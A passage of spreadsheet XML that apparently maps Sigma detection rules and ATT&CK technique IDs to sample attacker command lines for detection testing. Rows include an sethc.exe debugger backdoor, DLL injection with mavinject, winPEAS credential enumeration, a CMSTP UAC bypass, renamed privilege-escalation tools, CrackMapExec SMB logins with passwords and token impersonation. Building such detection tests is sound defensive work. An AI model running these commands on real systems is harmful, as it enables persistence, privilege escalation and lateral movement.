          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D295" s="43" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E295" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'; New-Item -Path $path; Set-ItemProperty -Path $path -Name Debugger -Value 'cmd.exe'"</t>
        </is>
      </c>
      <c r="F295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="43" t="n"/>
      <c r="J295" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K295" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B296" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C296" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D296" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E296" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INJECTRUNNING\\tevil.dll</t>
        </is>
      </c>
      <c r="F296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="43" t="n"/>
      <c r="J296" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K296" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B297" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C297" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D297" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E297" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe applicationsinfo</t>
        </is>
      </c>
      <c r="F297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="43" t="n"/>
      <c r="J297" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K297" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B298" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C298" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D298" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E298" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  applications info</t>
        </is>
      </c>
      <c r="F298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="43" t="n"/>
      <c r="J298" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K298" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B299" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C299" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D299" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E299" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe -applicationsinfo</t>
        </is>
      </c>
      <c r="F299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="43" t="n"/>
      <c r="J299" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K299" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B300" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C300" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D300" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E300" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe fileanalysis</t>
        </is>
      </c>
      <c r="F300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="43" t="n"/>
      <c r="J300" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K300" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B301" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C301" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D301" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E301" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  file analysis</t>
        </is>
      </c>
      <c r="F301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="43" t="n"/>
      <c r="J301" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K301" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B302" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C302" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D302" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E302" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe -fileanalysis</t>
        </is>
      </c>
      <c r="F302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="43" t="n"/>
      <c r="J302" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K302" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B303" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C303" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D303" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E303" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --fileanalysis</t>
        </is>
      </c>
      <c r="F303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="43" t="n"/>
      <c r="J303" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K303" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B304" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C304" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D304" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E304" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe servicesinfo</t>
        </is>
      </c>
      <c r="F304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="43" t="n"/>
      <c r="J304" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K304" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B305" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C305" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D305" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E305" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  services info</t>
        </is>
      </c>
      <c r="F305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="43" t="n"/>
      <c r="J305" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K305" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B306" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C306" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D306" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E306" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe -servicesinfo</t>
        </is>
      </c>
      <c r="F306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="43" t="n"/>
      <c r="J306" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K306" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B307" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C307" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D307" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E307" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --servicesinfo</t>
        </is>
      </c>
      <c r="F307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="43" t="n"/>
      <c r="J307" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K307" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B308" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C308" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D308" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E308" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe windowscreds</t>
        </is>
      </c>
      <c r="F308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="43" t="n"/>
      <c r="J308" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K308" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B309" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C309" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D309" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E309" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe -windowscreds</t>
        </is>
      </c>
      <c r="F309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I309" s="43" t="n"/>
      <c r="J309" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K309" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B310" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C310" s="43" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D310" s="43" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E310" s="43" t="inlineStr">
        <is>
          <t>update_service.exe -e 1</t>
        </is>
      </c>
      <c r="F310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I310" s="43" t="n"/>
      <c r="J310" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K310" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B311" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C311" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D311" s="43" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E311" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -NonI -w hidden -Command "$x=$((Get-ItemProperty 'HKCU:\Software\Microsoft\Windows Update').Update)"</t>
        </is>
      </c>
      <c r="F311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I311" s="43" t="n"/>
      <c r="J311" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K311" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B312" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C312" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D312" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E312" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe -s -ni C:\Path\To\Malicious.inf</t>
        </is>
      </c>
      <c r="F312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="43" t="n"/>
      <c r="J312" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K312" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B313" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C313" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D313" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E313" s="43" t="inlineStr">
        <is>
          <t>copy SharpUp.exe svchost.exe &amp;&amp; .\svchost.exe audit</t>
        </is>
      </c>
      <c r="F313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I313" s="43" t="n"/>
      <c r="J313" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K313" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B314" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C314" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D314" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E314" s="43" t="inlineStr">
        <is>
          <t>.\svchost_update.exe --all</t>
        </is>
      </c>
      <c r="F314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="43" t="n"/>
      <c r="J314" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K314" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B315" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C315" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D315" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E315" s="43" t="inlineStr">
        <is>
          <t>.\svchost_update.exe -c Hijackable"Paths</t>
        </is>
      </c>
      <c r="F315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="43" t="n"/>
      <c r="J315" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K315" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B316" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C316" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D316" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E316" s="43" t="inlineStr">
        <is>
          <t>[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes('C:\temp\SharpUp.bin')).EntryPoint.Invoke($null, @(,[string[]]@('UnquotedServicePath')))</t>
        </is>
      </c>
      <c r="F316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="43" t="n"/>
      <c r="J316" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K316" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B317" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C317" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D317" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E317" s="43" t="inlineStr">
        <is>
          <t>update.exe smb 10.0.0.0/24 --username admin --password pass --local-auth --exec-method smbexec -x whoami</t>
        </is>
      </c>
      <c r="F317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="43" t="n"/>
      <c r="J317" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K317" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B318" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C318" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D318" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E318" s="43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F318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="43" t="n"/>
      <c r="J318" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K318" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B319" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C319" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D319" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E319" s="43" t="inlineStr">
        <is>
          <t>crackmapexec.exe smb 192.168.1.10/24 --user='admin' --pass='password' --local-auth</t>
        </is>
      </c>
      <c r="F319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I319" s="43" t="n"/>
      <c r="J319" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K319" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B320" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C320" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D320" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E320" s="43" t="inlineStr">
        <is>
          <t>netexec smb 172.16.10.5 -u 'Administrator' -p 'P@ssword123' --local-auth</t>
        </is>
      </c>
      <c r="F320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="43" t="n"/>
      <c r="J320" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K320" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B321" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C321" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D321" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E321" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --user Administrator --pass P@ssw0rd123</t>
        </is>
      </c>
      <c r="F321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="43" t="n"/>
      <c r="J321" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K321" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B322" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C322" s="43" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D322" s="43" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E322" s="43" t="inlineStr">
        <is>
          <t>impersonate.exe exec cmd.exe</t>
        </is>
      </c>
      <c r="F322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="43" t="n"/>
      <c r="J322" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K322" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B323" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C323" s="43" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D323" s="43" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E323" s="43" t="inlineStr">
        <is>
          <t>ren impersonate.exe sysupdate.exe &amp;&amp; sysupdate.exe exec cmd.exe</t>
        </is>
      </c>
      <c r="F323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="43" t="n"/>
      <c r="J323" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K323" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B324" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C324" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D324" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E324" s="43" t="inlineStr">
